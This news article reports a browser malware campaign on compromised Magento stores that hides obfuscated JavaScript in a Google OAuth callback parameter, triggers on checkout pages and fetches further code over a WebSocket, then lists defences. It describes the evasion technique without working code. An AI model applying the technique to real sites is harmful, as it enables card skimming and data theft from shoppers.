Security researchers from c/side have discovered a cutting-edge browser-based malware campaign that leverages Google’s trusted OAuth domain to quietly deliver malicious JavaScript—effectively evading antivirus detection and entering systems during online checkout sessions.
FCRF x CERT-In Roll Out National Cyber Crisis Management Course to Prepare India’s Digital Defenders
How the Attack Works: Trusted Domain, Hidden Payload
The campaign begins when users visit a Magento-based e-commerce site compromised by attackers. The site embeds a script referencing a Google OAuth logout URL—accounts.google.com/o/oauth2/revoke—but includes a manipulated callback parameter. This parameter, once decoded, runs obfuscated JavaScript via eval(atob(…)), all while appearing to originate from Google. Domains like Google are typically whitelisted in content security policies and DNS filtering systems, allowing the malicious payload to execute unnoticed.
Activation triggers are context-specific: the script only executes in certain scenarios—such as during an automated browser session or when the URL contains “checkout.” Once active, it opens a WebSocket connection to a remote server, enabling real-time delivery and execution of browser-based malware, gaining access to sensitive user data or initiating further infection.
Algoritha: The Most Trusted Name in BFSI Investigations and DFIR Services
Why Antivirus and Filters Fail
Traditional antivirus solutions typically inspect local files or applications—not dynamic JavaScript executed from Google’s domains. These attacks don’t rely on downloads or executables; instead, they run entirely within the browser’s memory. Domain reputation systems and DNS-based filters, reliant on Google’s trusted status, largely ignore this activity. Even enterprise endpoint protection often overlooks such browser-level code execution unless it specifically inspects dynamic scripts or WebSocket behaviour.
Defence Strategies: Layered Security for Safer Browsing
- Limit third-party scripts on e-commerce and high-risk sites—use content-blocking extensions.
- Segment browser sessions: avoid using the same browser for financial transactions as for general browsing.
- Implement behavioural monitoring via browser sandboxing, proxy detection, or EDR solutions that flag unusual WebSocket behaviour.
- Adopt multi-layered security: combine advanced endpoint protection with real-time script analysis and domain-fronting detection.
About the Author – Anirudh Mittal is a B.Sc. LL.B. (Hons.) student at National Forensic Sciences University, Gandhinagar, with a keen interest in corporate law and tech-driven legal change.